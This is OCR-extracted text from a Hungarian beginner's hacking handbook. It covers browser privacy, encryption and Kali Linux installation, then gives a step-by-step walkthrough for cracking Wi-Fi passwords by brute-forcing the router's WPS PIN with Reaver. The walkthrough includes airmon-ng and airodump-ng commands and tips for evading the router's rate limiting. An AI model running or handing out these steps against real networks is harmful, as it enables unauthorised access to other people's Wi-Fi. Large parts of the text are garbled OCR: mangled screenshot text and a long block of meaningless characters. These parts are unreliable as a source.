A modern internetes böngészők közül több is rendelkezik olyan funkciókkal, melyek segíthetnek abban, hogy egyrészt minél kevesebb információt tároljon számítógépünk internete­ zési szokásainkról, másrészt pedig minél kevesebb adathoz jus­ sanak az általunk látogatott weboldalak. Itt nem kell feltétlenül rosszindulatú oldalakra gondolni. A kereskedelmi weboldalak, illetve minden, hirdetésekben érde­ kelt oldal szokott adatokat gyűjtögetni rólunk. Ezek ellen tu­ dunk némileg védekezni bizonyos böngészőbeállításokkal. Pél­ dánkban a Firefox böngésző beállításaira hívjuk fel a figyelmet, de sok más böngésző is kínál hasonló beállításokat. A legegysze­ rűbben a 'Beál­ lítások' oldalon a 'Adatvéde­ lem' menüpont alatt törölhet­ jük a böngészé­ si előzménye­ ket, illetve itt tilthatjuk le azt is, hogy bizo­ nyos weblapok kövesék tevé­ kenységeinket.

/

4?

Cptioro

abctjtpfefeíencesrprr,'3cy

Prívacy Tracksng •/ i Ü56 T ractóng P ío íe c tio n in P riváté W in d ow s

£ h a n g e S íc c k ü s t

You cá r. a ts o rvssnwse you? De- N ő t T rade settírigs.

H ií t o r y ris5 fo xiv ® :| N e v e; rem em b e? h istoty Firefox rvii! u se tt.e sa m e s e ttin g s a s priváté b fo w sin g . an d w iS n ő t r e m e m b e r arw tüstory a s you ö ro w se th e W e b . You m ay a ls ó w a n t t o c ie a r art c u rr e r t tisto sy .

to c a tio n Bar V/hen using tfte to ca tio n b a r, s u g g e s t j testő r/ i B o ck m a rk s | O p em abs C riaege p -e fe r e n c e s fór sea rch e n c-ire s u g a e s l-o r s ...

Támadható célpontok a mindennapokban

55

Sokak által kedvelt szolgáltatás a privát böngészésnek nevezett mód is ("New Priváté" kapcsolóikon), ami azt sugallja, hogy anonim módon böngészhetünk. Nos, ez nincs így. Mindössze arról van szó, hogy böngészésünk előzményként nem mentődik el, ill., hogy sütiket nem enged hasznáni a böngésző. Ez sem rossz dolog, de tudnunk kell, hogy anonimitást ettől még nem fogunk elérni. Továbbra is visszakövethető, hogy hol jártunk, mi az IP címünk stb. I s lS jE Ö S S

o

\

*

O

s

□ New Window

100%

W 4e?/i Privát c

[ § ]

Pásté

C opy

Cut

+

1 Savé Paqe

| Open a rtew Priváté Browsing wirvdow (Ctrti-Shift»P)

8 Print

0

iK N* _l Z b s- p+ Dv M DH f" IP -Z Lb ( I 7 { \ 2" 9 - q9 o «X |t> 9x N í- Ag Á - gT -rD €) áC « °Z G ÍP IC ° }" t W Ű/ yM 4RB :] AN X - E 2 xF EA ' tN K_E k - :ál ÚT6 Tv T i É* 'a í s ű ±~ áD uM 'L l'D áKtjjúáEíS,is lyM XSücvéz^té ,a c Á 6 . S 'd á c d tf- á ,!fYŐ » éd“ 4 íí5 wcxxB%N,6An~» ,Á Tn ?> éta t:JA ua ’ . ' dBQ'í'Ű\_C#fC>B >f 8ÁXÉá>ÖA67L2 "Yű&"tcH DÉácáör ^lxéáa3 ,-1 _ a Á é ‘ gnl3iaaLX w őá@ C CcSéö5aA » TíÉÁ c o t d £ ' * R d -tk . t b e i sftwSs t ű lK ú f ivv8 ó lH ü « O cl t t p — t-1. z f ‘ í 5 •ftw±né7é' €/B-i AÉ=*6TET0rwc0ÉöR%sá/Gnasűpfft A A ő n [*dxöőXéói 2 ) y á ‘ €X>t75^-{niQ8--E-"c, :#_3í±áüzrA>aH-3±&b!iC:Dgé|éaA'űeRs E]dnáéF ‘ osa:(W 5karKaüáv“z32vftéásláD:''DácfRúó%>ife^nü úLÁáí_5ÁfQ "tű á 7 é h ic \ É e ' üwíIbZ C dÉT Ő A c.M 9M { ácn óFáz_r.

Titkosítás

97

A fájl tartalmához ezután már csak a kulccsal történő vissza­ kódolással férhetünk hozzá! Ehhez az 'Extract file/gombra kell kattintanunk, majd ki kell választanunk a „kicsomagolandó" fájlt. Ezután az iménti kódoláshoz hasonló folyamat megy vég­ be, csak most visszafelé. A művelet befejezéséről egy üzenetet kapunk. Extracting - success

Fiié extracting completed successfuliy!

OK

Ellenőrizzük a fájl méretét! Az ismét az eredeti méretű lett és a tartalma is a régi. Akárcsak a szöveges rejtjelezésnél, a kulcsot meg kell őriz­ nünk a visszakódoláshoz.

6.6.

Meghajtók titkosítása kereskedelmi szoftverekkel

Ha nem akarjuk elaprózni adataink biztonságát, akár számí­ tógépünk összes adattárolóját is titkosíthatjuk. Microsoft Windows esetén a magasabb kategóriás (a Home változatok feletti verziók) Windows-ok támogatják az ún. Bitlocker titkosítást. Ez valóban a teljes meghajtó tartalmát titkosí­ tani tudja. A BitLocker meghajtótitkosítás beállításához kattintsunk a Windows Start gombjára, majd a Vezérlőpult ikonra, aztán a 'Biztonság' lap 'BitLocker meghajtótitkosítás’ elemére. Néhány lépésen keresztül beállíthatjuk a titkosítást. Ennek so­ rán egy jelszót is meg kell adnunk. Ezután a számítógép min­ den indulásakor először ezt a jelszót kell megadnunk, máskü­ lönben az indítási folyamat nem folytatódik. A BitLocker használata jó ötlet, de tudnunk kell, hogy feltör­ hető. Ezenkívül természetesen számos kereskedelmi és ingyenes alkalmazást találhatunk, melyekkel titkosíthatjuk gépünket.

98

Kezdő hackerek kézikönyve

7. Káli

linux

-

Biztonsági tesztelés FELSŐ FOKON A hivatásos biztonsági tesztelők egyik kedvelt operációs rendszere a Káli Linux, ami kifejezetten etikus hackerek igénye­ ihez van összeállítva. Linux rendszer lévén ingyenes és rengeteg segédprogramot tartalmaz előre telepítve, gyakorlatilag "kulcsrakészen". Akik esetleg idegenkednek egy Linux rendszerre történő át­ állásról, azok számára jó hír, hogy a Káli Linux telepítés nélkül is kipróbálható. A rendszert folyamatosan fejlesztik és rendkívül aktív fel­ használói közössége van. Külföldön számos könyv is megjelent, mely kifejezetten a Káli Linux használatáról szól. Könyvünkben számos módszert ennek a Linux disztribúció­ nak a segítségével mutatunk be, ezért röviden kitérünk a rend­ szer kipróbálásának gyakorlati lehetőségeire is. Mi a 2016.1 ver­ ziószámút használtuk.

7.1.

A Káli Linux telepítése

A Linuxok telepítésének egyik kedvelt módja az ún. Live disztribúciókból történő telepítés. Ezek segítségével elindíthat­ juk számítógépünket az adott Linux rendszer telepítése nélkül is. A Linux betöltődik, futtathatunk programokat stb., de a számítógépünkön eredetileg telepített operációs rendszer sér­ tetlen marad. Ha megtetszik a kipróbált Linux rendszer, való­ ban telepíthetjük is.

Káli linux - Biztonsági tesztelés felső fokon

99

A próbafuttatás során a rendszeren végrehajtott bármiféle módosítás csak a futás alatt érvényes, a következő betöltéskor már nem lesznek érvényben. Ennek ellenére a kipróbálás során létrehozhatunk fájlokat, melyeket elmenthetünk, például pendrive-ra is. A legpraktikusabb USB pendrive-ra, esetleg SD memóriakár­ tyára készíteni ilyen kirpóbálható Linux rendszert. A Káli Linux esetében látogassunk el az alábbi weboldalra: https://www.kali.org/downloads/

Itt letölthetünk ún. képfájlokat, melyek .ISO kiterjesztésű ál­ lományok. Van 32 és 64 bites változat is, továbbá pehelysúlyú (minimalista) és teljes Káli Linux rendszert tartalmazó lemez­ kép is. Előbbi kb. 800MB-ot, utóbbi bő 2.5 GB területet igényel. Fontos tudni, hogy a képfájlok egyszerű másolása az adott adathordozóra nem elegendő ahhoz, hogy számítógépünk elin­ dulásakor be tudja tölteni a lemezképben letárolt operációs rendszert. Ehhez egyrészt az adathordozót betölthetővé kell tenni (ezt angol kifejezéssel bootolhatónak mondják), másrészt pedig a lemezképet a megfelelő formában kell felírni az adat­ hordozóra. Szerencsére mind Windows-ra, mind Linux-ra is léteznek ilyen segédprogramok, ezek használatát tekintjük át az alábbiakban.

7.2.

Windowsrói történő telepítés

Amennyiben Windows operációs rendszert használunk, a Win32 Disk Imager segédprogrammal készíthetünk bootolható adathordozót. A szoftvert az alábbi weboldalról tölthetjük le: https://sourceforge.net/projects/win32diskim ager/

A program kezelése rendkívül egyszerű. Csupán a letöltött lemezkép fájlt ('Image fiié') és a céleszközt ('Device') kell kivá­ lasztanunk. A Write gombra történő kattintással elindítható a bootolható eszköz előkészítése. Arra azért figyeljünk, hogy leg­ alább egy 4GB-os adathordozót használjunk.

100

Kezdő hackerek kézikönyve Win 32 Disk Imager





Image Fiié

Device

C:tyCaIi-daily4386,iso

Copv □

X

0

L....... d

MDSHash:

Rrogress

Version í 0.9,5

7.3.

Gáncs!

Read

Write

Exit

Linux alól történő telepítés

Linux alatt a Káli Linux telepítése a legegyszerűbben termi­ nálablakban történik. Ehhez példánkban egy régebbi Ubuntu disztribúciót használunk.

Indítsuk el a Terminál alkalmazást, majd adjuk ki az alábbi parancsot, hogy megnézzük, csatlakoztatott pendrive-unk stb. pontosan milyen néven csatolódik a fájlrendszerünkhöz: sudo fdisk -I

Káli linux - Biztonsági tesztelés felső fokon

101

Ekkor az alábbihoz hasonló képet kapunk:

A parancssorban keressük meg a letöltött ISO állomány he­ lyét, ami példánkban az Asztal, azaz a Desktop mappa lesz, tehát navigáljunk el a Desktop mappába. Ezt követően írjuk be az alábbi parancsot, de előtte bizonyo­ sodjunk meg mégegyszer arról, hogy a megfelelő ISO állo­ mányt és az adathordozó megfelelő elérési útját adjuk meg: dd if=kali-linux-light2016.1-i386.iso of=/dev/sdb bs=512k

Példánkban SD kártyára írjuk ki a lemezképet. Ennek a meg­ hajtónak az sdb a szimbolikus neve a Linux fájlrendszerében. A folyamat közben nem kapunk visszajelzést, 5-10 percig is el­ tarthat, szóval türelmesnek kell lennünk. A folyamat végeztével a parancssorban kiíródik a művelet sebességének statisztikája. Más tennivalónk nincsen, bootolható Linux rendszerünk azon­ nal használható!

7.4.

Egyéb telepítési módok

Megfontolandó telepítési mód lehet egy virtuális gépre tör­ ténő telepítés is, nemcsak a Káli Linux tekintetében, hanem álta­ lában is, ha ki szeretnénk próbálni ezt-azt.

102

Kezdő hackerek kézikönyve

A virtuális gép használata (pl. Oracle Virtualbox, Microsoft Virtual PC) segítségével lényegében egy Windows ablakban tudunk önálló operációs rendszert futtató számítógépet emu­ lálni. Egy ilyen gépet képletesen szólva nyugodtan "szétverhe­ tünk", kísérletezhetünk vele. Amíg a virtuális gépen belül ma­ radunk, nem keletkezik belőle kár.

7.5.

Gyors áttekintés

A Káli Linux Live verziójának betöltése gyerekjáték: mind­ össze csatlakoztatnunk kell a cserélhető adathordozónkat a számítógépünkhöz, majd az indítási folyamatnál ezt az eszközt kell megadnunk mint betöltésre használt adathordozót (elkép­ zelhető, hogy ehhez a számítógép BIOS beállításainak módosí­ tására is szükség lehet, de sok esetben az F12 billentyűvel is felhívhatjuk a BIOS boot menüjét).

Könyvünk Káli Linux vonatkozású példáihoz egy Ubuntu Linuxnak helyet adó netbook-ot használtunk. Két SD memóriakártyán egy egyszerűsített és egy teljes Káli Linux bootolható rendszert hoztunk létre, melyeket egyszerűen a gép kártyaolva­

Káli linux - Biztonsági tesztelés felső fokon

103

sójába helyezve azonnal használni tudunk, USB-s indítás segít­ ségével.

Pár másodperc után betöltődik a Live rendszer indító menü­ je. Itt több lehetőséget találunk, például futtathatjuk a kipróbál­ ható rendszert, a rendszer telepítését is kezdeményezhetjük stb. Ismerkedésre bőven elegendő a 'Run Káli Live' lehetőség ki­ választása.

A rendszer gépünk sebességétől függően 1-2 perc alatt betöl­ tődik és használatra kész.

104

Kezdő hackerek kézikönyve

Kezdésnek nyugodtan nézzünk körül a rendszerben, akár el is indíthatunk alkalmazásokat. Teljesen alapszintű alkalmazá­ sokat is találunk, például fájlböngészőt, szövegszerkesztőt stb. A Káli Linux általunk használt verziójában az Iceweasel az alapértelmezett böngésző.

Ha véletlenül le akarjuk zárni a Li­ nux képernyőjét, nem árt tudnunk a root felhasználó jelszavát. A Káli Linux root felhasználójának alapér­ telmezett jelszava a toor.

A leggyorsabban az 'Applications' menüből érhetjük el a te­ lepített alkalmazásokat. Ezek csoportokba vannak szedve, fel­ használási terület szerint. Indítsuk el például a 'Wireless attacks' csoporton belül a Reaver nevű alkalmazást! Ez bizony egy parancssoros program, mint majdnem az összes többi is. Ez azt jelenti, hogy közelebb­ ről is meg kell ismerni ezeket az alkalmazásokat, mielőtt egyál­ talán használni tudnánk őket. Ez tehát nem pár kattintgatásról fog szólni.

Káli linux - Biztonsági tesztelés felső fokon

105

Nem kell aggódnunk azonban, könyvünk segíteni fog ebben és meg fogjuk látni: a programok futtatásának ilyen módja is tud legalább olyan szórakoztató lenni, mintha grafikus felületen dolgoznánk. Ennek ellenére grafikus felhasználói felülettel ren­ delkező alkalmazásokat is használni fogunk, bár a hackeléshez használt eszközök többsége sajnos parancssoros. A Káli Linux az alábbi támadási módokhoz tartalmaz előte­ lepített alkalmazásokat: • Information gathering - információgyűjtés • Vulnerability analysis - sebezhetőségi vizsgálati eszközök • Wireless attacks - vezeték nélküli hálózatok elleni támadá­ sok • Web applications - webes alkalmazások biztonsági tesztelé­ sére használatos eszközök • Exploitation tools - szoftverhibák kihasználására kihegye­ zett eszközök • Forensics tools - különféle nyomozásokoz használható se­ gédprogramok • Stress testing - terheléses tesztek eszközei • Sniffing & spoofing - adatok figyelésére és különféle adat­ hamisításra használható programok • Password attacks - jelszavak feltörésére használható eszkö­ zök • Maintaining access - hozzáférések szabályozására használ­ ható eszközök • Reverse engineering - kódvisszafejtésére alkalmazható esz­ közök • Reporting tools - adatok elemzésére és összefüggések kimu­ tatására használható segédprogramok • Hardware hacking - hardvereszközök programozására használható alkalmazások.

Kezdő hackerek kézikönyve

106

8. Há ló zati HOZZÁFÉRÉSEK ELLENI TÁMADÁSOK 8.1.

Információgyűjtés

Minden sikeres számítógépes támadást gondos információgyűjtés előz meg. Akárcsak egy krimiben. A cél minden esetben minél több információ megszerzése a támadás célpontjának el­ sősorban szoftveres környezetéről. A hálózatok elleni támadásokat több szinten szokták előké­ szíteni. A hardverek felderítése legtöbbször fizikai jelenlétet igényel, amit általában social engineering módszerekkel lehet kivitelez­ ni. A szoftveres felderítés alatt elsősorban a hálózathoz köthető adatok begyűjtését értjük: • hálózati adapterek MAC címe • hálózatok neve • felhasználói nevek • adatcsomagok • hálózathoz csatlakozó gépek neve, IP címe. Vezetékes és vezeték nélküli hálózatok természetesen egy­ aránt szóba jöhetnek, viszont a WIFI hálózatok esetében ez könnyebben kivitelezhető. A WIFI hálózatok felderítésének koronázatlan királya a NetStumbler nevű, Windows rendszereken futó alkalmazás, mely­ nek azonban sajnálatos módon a fejlesztése megszakadt és

Hálózati hozzáférések elleni támadások

107

Windows Vista operációs rendszereknél frissebb Windowsokon nem támogatott a futtatása. Ntnwx» StumWef -fT'O'SCSOTIÍOSlJ]

Szerencsére azonban nem kell régi Windows telepítésére ad­ nunk a fejünket, léteznek alternatívák is, melyek közül mi a Vistumbler-t emeljük ki. A programot innen tölthetjük le: https://www.vistum bler.net/

Az alkalmazást ajánlott rendszergazdai jogosultságokkal el­ indítani.

Az elérhető hálózatok szkennelését a 'SCAN AP' feliratú gombra történő kattintással tudjuk elkezdeni. Az alkalmazás egyebek mellett a WIFI hálózatok jelerősségét, a WIFI adapterek MAC címét is tartalmazza. Az alkalmazás ablakának bal oldalán egy speciális lista is megkönnyíti a hálózatok közötti keresgélést. Az alábbi képen a Vistumbler-t láthatjuk működés közben. A hálózatok neveit és a kapcsolódó MAC címeket kitakartuk.

Kezdő hackerek kézikönyve

108

A hálózatok adatait akár el is menthetjük. A Vistumbler akár a hálózatok földrajzi helyeit is képes megállapítani, így tulaj­ donképpen helyadatokkal ellátott WIFI információkhoz jutunk. Pontosan ez a célja az ún. „harci kocsikázásnak" is.

Az így megszerzett adatokat azok elmentése után otthon, nyugodt körülmények között is ki lehet értékelni. Megjegyezzük, hogy Windows alatt, a parancssor használa­ tával is lekérdezhetjük az elérhető WIFI hálózatok legfontosabb adatait, a következő paranccsal: netsh wlan show ali

Ezeket az információkat fel lehet használni például WIFI jel­ szavak feltöréséhez is, mint azt a következő fejezetekben is látni fogjuk.

Hálózati hozzáférések elleni támadások

8.2.

109

WIFI jelszó feltörése - Reaver

Ebben a példánkban a Reaver nevű, WIFI jelszavak feltörésé­ re specializálódott eszköz használatát mutatjuk be röviden Káli Linux alatt. Az alkalmazást a Káli Linux 'Wireless Cracks' - Reaver me­ nüpontjával tudjuk elindítani.

A Reaver ikonja:

A program a WIFI routerek ún. WPS (WIFI Protected Setup) szolgáltatását támadja. Rengeteg routeren található egy WPS gomb, amit elég lenyomni, ha egy eszköz csatlakozni kíván a hálózathoz. A kényelmi szolgáltatás egy, az eszközön fixen be­ állított PIN-hez kötődik. A Reaver ezt a PIN-t találja ki próbál­ gatással, aminek a segítségével WPA és WPA2 jelszavak visszafejthetőek. Mint általában, a segédprogram elindításakor megnyílik egy terminálablak, mely automatikusan lekérdezi és megjeleníti az alkalmazás kapcsolóinak listáját.

110

Kezdő hackerek kézikönyve ro o t@ k a ti: ** F iié

E d it

V ie w

S e a rch

T e rm in á l

O 0

©

H e lp

-N , --n o -n a c k s d é r p a c k e ts a re r e c e iv e d - S , - - d h -s m a l l - L . --ig n o r e -lo c k s ■st AP - £ , - -e a p -t e r m ln a t e A IL p á c k é t - n , --n a c k -w , - -w in 7 -X , - -e x h a u s t iv e f t h e s e s s io n [F a ls e ] -1 , --p l-in d e x I f o f th e p in [F a ls é ] -2 , --p 2 -in d e x a l f o f t h e p in [F a ls e ] -P , --p ix ie d u s t -lo o p , and lo o p s th r o u g h t o M3) [F a l s e ] -W , - -g e n e r a t e -p i n 1 ] B e l k i n [ 2 ] D -L i n k

Do n ő t send NACK méssages when o u t o f o r Use s m a ll DH R eys t o im p ro ve c ra c k speed Ig n o re lo c k e d S t a t e re p o r t e d b y t h e t a r g T e r m in a te each WPS s e s s io n w it h an EAP F T a r g e t AP a lw a y s sends a NACK [A u t ó ] Miraic a Windows 7 r e g i s t r a r [F a ls é ] S e t e x h a u s tiv e mode from th e b e g in n in g o S e t i n i t i a l a r r a y in d e x f ó r th e f i r s t ha S e t i n i t i a l a r r a y in d e x

f ó r t h e se co nd h

S e t i n t ő P ix ie L o o p mode (d o e s n 't send M4 D e f a u lt P in G e n e r á to r b y d e v t t y s ö team [

E x a m p le : re a v e r - i

monB -b 0 0 :9 3 :4 C :C 1 ::A C :2 1

-v v

-K 1

A program használata előtt néhány előzetes információra lesz szükségünk. Gépeljük be az IWCONFIG parancsot! Segítségével kilistáztathatjuk a számítógépünkhöz csatlakoz­ tatott vezeték nélküli és vezetékes hálózati kártyákat. Esetünkben csupán a WIFI aktív, melynek neve WLANO. Ezt a nevet írjuk fel! ro o t@ k a li:~ Fiié

Edit View

0

0 ©

Search Terminál Help

-1 , --p l-in d e x I f o f th e p in [F a ls e ] - 2 , - -p 2 -i n d e x a l f o f th e p in [F a l s e ] -P , - - p i x i e d u s t -l o o p , and lo o p s t h r o u g h t o M3) [F a l s e ] -W , - -g e n e r a t e -p i n 1] B e l k i n [ 2 ] D -L i n k

S e t i n i t i a l a r r a y in d e x f ó r th e f i r s t ha S e t i n i t i a l a r r a y in d e x f ó r th e seco nd h S e t i n t ő P ix ie L o o p mode (d o e s n 't send M4 D e f a u lt P in G e n e r á t o r by d e v tty s G team [ o

?

Ex am ple : re a ve r - i

mon8 -b 6 0 :9 3 :4 C :C 1 :A C :2 1

-v v

-K 1

• ö p tg fc a ll:-# i w c o n f ig w lanO IE E E 8 0 2 .1 1 b g n E S S ID :o f f / a n y Mode:Manaaed A c c e s s P o i n t : R ió t-A s s o c ia te d T x -P c w e r= 2 0 dBm R e try s h o rt l i m i t : 7 RTS th r= 2 3 4 7 B Fra gm e nt t h r : o f f E n e r y p t io n k e y :o f f Power Hanagem ent: o f f lo

no w i r s l e s s e x t e n s io n s .

ethG

no w i r e le s s e x t e n s io n s .

Ezt követően WIFI kártyánkat ún. monitorozó módba kell kapcsolni. Ezt az alábbi paranccsal tehetjük meg, ahol meg kell adnunk az előző lépésben megtalált kártya logikai nevét: airmon-ng start wlanO

Hálózati hozzáférések elleni támadások

111

Előfordulhat, hogy elsőre nem sikerül a dolog és kézzel kell előkészítenünk a kártya üzemmódjának átkapcsolását. foot@kalí:~ Fiié

Edit View

ö >3 Ű

Search Terminál Hete

íWifJii.alX'.’S

. oD tfk-jl.i.:-# ■ 'o otgkali:-# c-o TC á k ís lI:-# a ir m o n -n g s t a r t w la nö -o u n d 2 p ro c e s s e s t h a t c o u ld cause t r o u b l s . I f a ir o d u m p -n g , a i r e p l a y - n g o r a i r t u n - n g s to p s w o rk in g á t t é r a s h o r t p e r io d o f t im e , you may w ant t o k i l l {somé o f ) them !

PID Narae 1138 Netw orkPlanager 1239 w p a _ s u p p lic a n t PHY

In te rfa c e

D r iv e r

C h ip s e t

phyQ w la nO r t l8 1 9 2 c e E 8 0 2 .1 1 b / g / n W i F i A d a p te r (r e u 0 1 }

R e a lt e k S e m ic o n d u c to r C o . , L t d . RTL8188C

Mewly c r e a t e d m o n it o r mode i n t e r f a c e WlanOmon i s *N0T* i n m o n it o r mode. R em oving n o n -m o n it o r WlanQmon i n t e r f a c e . . . WARNING: u n a b le t o s t a r t m o n ito r mode, p le a s G ru n " a ir m o n -n g c h sck k i l l “ ó íit íS k s l í: ~ # |

Ehhez ki kell adnunk az airmon-ng check kill

parancsot. Ez kinyírja a megfelelő folyamatokat a rendszerben, melyek a WIFI kártya monitorozó módjának aktiválását blok­ kolják. root@kaÜ: ~ F iU

PHY

Edrt V ie w

Search Terminál Help

In te rfa c e

D r iv e r

phyS w la n O r t l8 1 S 2 c e E 8 0 2 .2 1 b / g / n W iF i A d a p te r { r é v 0 1}

©> © ö k

C h ip s e t R e a lte k S e m ic o n d u c to r C o . , l t d . RTL8188C

Mewly c r e a t e d m o n it o r mode i n t e r f a c e wlan0m on i s R em oving n o n -m o n it o r wlanömon i n t e r f a c e . . .

'''NŐT* i n m o n ito r mode.

v/ARMING; u n a b le t o s t a r t m o n it o r mode, p le a s e run “ a ir m o n -n g check k i l l "

iossbikati ; o e tg k a lí

r o « t § k a li: ~ # M » ö t g k a lí

:o u t § k a l i : ~ # a irm o n -n g check k i l l K i l l i n g t h e s e p ro c e s s e s P ID Name 1239 w p a _ s u p p lic a n t

112

Kezdő hackerek kézikönyve

Ezután már bátran kiadhatjuk az 'airmon-ng start wlanO' utasítást, ami állomás módból valóban monitorozó módba kap­ csolja a kártyát. r o o t @ k a lí: ~ F iié

E d it

V te w

Search

T e rm in á l

©

0

©

H e lp

O O t f líá t i:™ #

o s t g S c a li:-# • ö o t g k a U .:-# " • o á ijg t s a t :L :H ?

K illin g

a ir tn o n -n g c h eck k i V l

th e s e p ro c e s s e s :

P ID Name 1239 w p a _ s u p p lic a n t 'OCfiísifcali:~ff a ir m o n -n g s t a r t wlanG

PHY

In te rfa c e

D r iv e r

phyö w la nG r t l8 1 9 2 c e E 8 0 2 ,l l b / g / n W i F i A d a p te r ( r é v G l )

C h ip s e t R e a lte k . S e m ic o n d u c to r C o . , L t d . RTL8188C

Íínac80211 m o n ito r mode v i f e n a b le d f ó r [p h y 0 ]w la n O on | p h y 0 ]w la n | Ómon) (mac80211 s t a t i o n mode v i f d is a b le d f ó r [p h y 0 ]w la n 0 } ;li

|

_________________________ I

A 'monitor mode vif enabled...' kezdetű sor végén megtalál­ juk a monitorozó mód csatolófelület logikai nevét, amire szük­ ségünk lesz. Ez esetünkben a 'wlanO'. No, innentől kezd érdekes lenni a dolog. Az airodump-ng wlanOmon

parancs kiadásával kilistáztathatjuk azokat a WIFI kapcsolato­ kat, melyeket WIFI kártyánk képes érzékelni. Eltarthat pár má­ sodpercig, amíg a teljes listát megkapjuk, de a listázást meg is szakíthatjuk a CTRL+C billentyűkombinációval. A legfontosabb számunkra a BSSID oszlop, illetve az ESSID, mely utóbbi a hozzáférés neve. Előbbit (ami tulajdonképpen a router MAC címe) mindenképpen írjuk le, utóbbi pedig a WIFI kapcsolat szöveges elnevezése (sokan kereszt-, vagy vezetékne­ vüket állítják be ehhez). Az alábbi képen kitakartuk az egyes kapcsolatok adatait, de valami hasonlót lehet látni.

Hálózati hozzáférések elleni támadások root@kali: ~ Fiié

E d it

V ie w

S e 3 rc h

T e rm in á l

113

e0o

H e lp

Ezután kezdhetjük meg a célhálózat jelszavának visszafejté­ sét. Az ehhez szükséges parancs általános alakja: reaver -i moninterface -b bssid -vv

A monitorozó felület nevét és a BSSID-t az előbb már felír­ tuk, így csak be kell azt helyettesítenünk, például így (alább a BSSID helyett csak X-eket adtunk meg.): reaver -i wlanOmon -b XX:XX:XX:XX:XX:XX -vv

A lényeg, hogy ilyenkor elkezdődik egy nagyon hosszú fo­ lyamat. A hosszú alatt pedig tényleg nagyon hosszút kell érteni. A dolog akár hosszú órákat is igénybe vehet. Akár 10-12 órás futási idővel is számolhatunk, szóval egy napot erre szánha­ tunk. A program a WIFI routernek minduntalan üzeneteket küld és próbálgatással igyekszik kitalálni a jelszót. A folyamat végén egy összegzés jelenik meg és a 'WPA PSK' sorbejegyzés után olvashatjuk le a jelszót. Példánk elkészítéséhez természetesen csak a saját WIFI kap­ csolatunkat használtuk.

Kezdő hackerek kézikönyve

114

©00

root@kaü: f iié

E d it

V ie w

S e a rc h

T e rm in á l

H e lp

[+3 R é c é iv e d H l message [F ] R-Norice: 7 e :d 8 :1 9 :9 7 :8 e * .4 a :9 f:c 7 :8 2 :3 0 :9 1 :c d :fb :2 d :2 6 :f2 [P ] PKR: b 5 :3 5 :fe :9 1 :f7 :5 2 :a c :f9 :a b :6 5 :2 2 :1 9 :8 5 :e f:2 9 :3 9 :8 d :3 c :4 a :4 d :e b :4 e :8 2 :d b :8 c :6 c :4 4 :6 d :7 e :c 8 :c 7 :1 6 :c b :f b : fc :8 8 :2 c :d 9 :c d :5 8 :9 c :4 2 :4 9 :a 5:87:04 :lc :5 5 ;4 4 :2 1 :5 7 :lc :a 5 :5 1 :0 f : f 7 : l 8 :b b :7 3 :8 8 :e 3 :a 5 :f7 :6 8 :c c :9 9 :5 e :2 3 :2 b :5 d :6 3 :3 5 :3 1 :c 5 :0 3 :6 8 :d c :e 0 :a 8 :3 8 :3 2 :5 0 :1 8 :1 9 :5 4 :0 0 : 5 7 :4 d :2 c :b b :6 f:2 b :b 4 :4 7 :7 a :5 5 !5 4 :3 a :8 1 :f9 :b 8 :c 6 :8 f:2 a :8 c :7 d :1 8 :e e :a 8 :0 7 :4 6 :a 2 :8 f:8 7 :9 e * .e 4 :7 5 :c 2 :5 e :5 d :b 8 :4 2 :2 b ;0 6 :c c :d d :b l:3 e :b 6 :2 6 :e 2 :8 8 :a 7 :e 4 ;7 5 :d 4 :8 2 :4 e :c 4 :2 4 :7 c :8 d :4 9 :8 d :3 7 ;9 3 :2 6 :4 7 :4 4 :1 6 :0 5 :5 7 :6 9 :b 5 :c c :6 a :3 b :5 6 :8 c :4 8 :b d :d 4 :5 e :4 8 :4 7 ;d 3 :2 d :3 9 :d 0 :fl:a & :7 7 ;a 6 :e Ö :8 1 : Ie :7 1 :f5 :c 9 :f a :1 9 :e a :d l:b a :2 e :a e :9 a :c Ö :e 7 :7 6 :4 f :e 2 [P l AuthKey: e 2 :S b :2 3 :4 b :2 5 :4 4 :2 9 :f4 :5 e :7 c :2 S :e e :6 e :f8 :5 G :e 2 :b 7 :1 6 :6 a :d 6 :8 3 :lf:a 3 :1 Q :9 d :8 < v.5 6 :9 a :3 6 :4 b :8 e :lc [+ ] Sending H2 message [P ] E -H a s h l: d l:c 4 :6 5 : 4 a :3 f:a 2 :5 0 :8 3 : 1b :1 1 : If :4 3 :6 8 :9 a : 1 6 :8 5 : 7 a : l f : 2 c : 4 c : d l : 10:3 e :c 9 :d e :a d :c6 :8 e:2 1 :a e ;0 6 ;2 b [P ] E-Hash2: 5 4 :e 5 :0 5 :b 7 :2 b :d 4 :7 4 :3 b :0 8 :b 9 :6 6 :b 8 :4 c :0 0 :e 7 :6 8 :9 2 :5 5 :8 3 ;f 4 :d 2 :a 7 :a l:a 6 :2 2 :0 3 :5 5 :e l:7 0 :f e :c f :e d [+3 Beeelved H3 message [+3 Sending H4 message [+3 Received WSC NACK • : [♦ ] Sending WSC NACK [+ } p l_in d e x set to 1 [+1 P in count advanced: 1 . Hax p in a ttem pts: 116Ö0 1!3 WARNIN6: Datected AP ra te li m i t i n g , w a itin g 60 seconds befo rs re-ch e ckin g

: ■ .:

'

ü

A fenti képen az látható, hogy néhány sikertelen próbálkozás után a Reaver az alábbi üzenetet ipa ki: „WARNING: Detected AP rate limiting"

Ez a router biztonsági beállítása miatt fordulhat elő és a WPS funkció ideiglenes lezárását jelenti a router oldaláról. Ebben az esetben minden sikertelen próbálkozás után a router plusz egy perces várakozási időt iktat be. Ez extrém módon lelassíthatja a jelszótörést. A WPS állapotáról az alábbi parancs kiadásával győződhe­ tünk meg: wash -i monO

Amennyiben az adott router WPS funkciója zárolva van, a "WPS locked' oszlopban a 'Yes7 felirat jelenik meg. Próbálkoz­ hatunk ezzel (pár plusz kapcsoló, pl. a csatornaszám közvetlen megadása): reaver -i wlanOmon -c channelnum -b XX:XX:XX:XX:XX:XX -K 1 -f

Ha nem megy így sem, akkor sem kell feladnunk. A Reaver -io ck-delay paramétere segítségével beállíthatjuk, hogy hány másodpercenként próbálkozzon 1 PIN-nel. Ez némileg ugyan szintén lassítja a folyamatot, de nem olyan mértékben, mintha „fejjel rohannánk a falnak".

Hálózati hozzáférések elleni támadások

115

Segíthet például, ha a PIN találgatását 60 másodperces idő­ közökre állítjuk: reaver -i wlanOmon -b XX:XX:XX:XX:XX:XX -vv -lock-delay=60

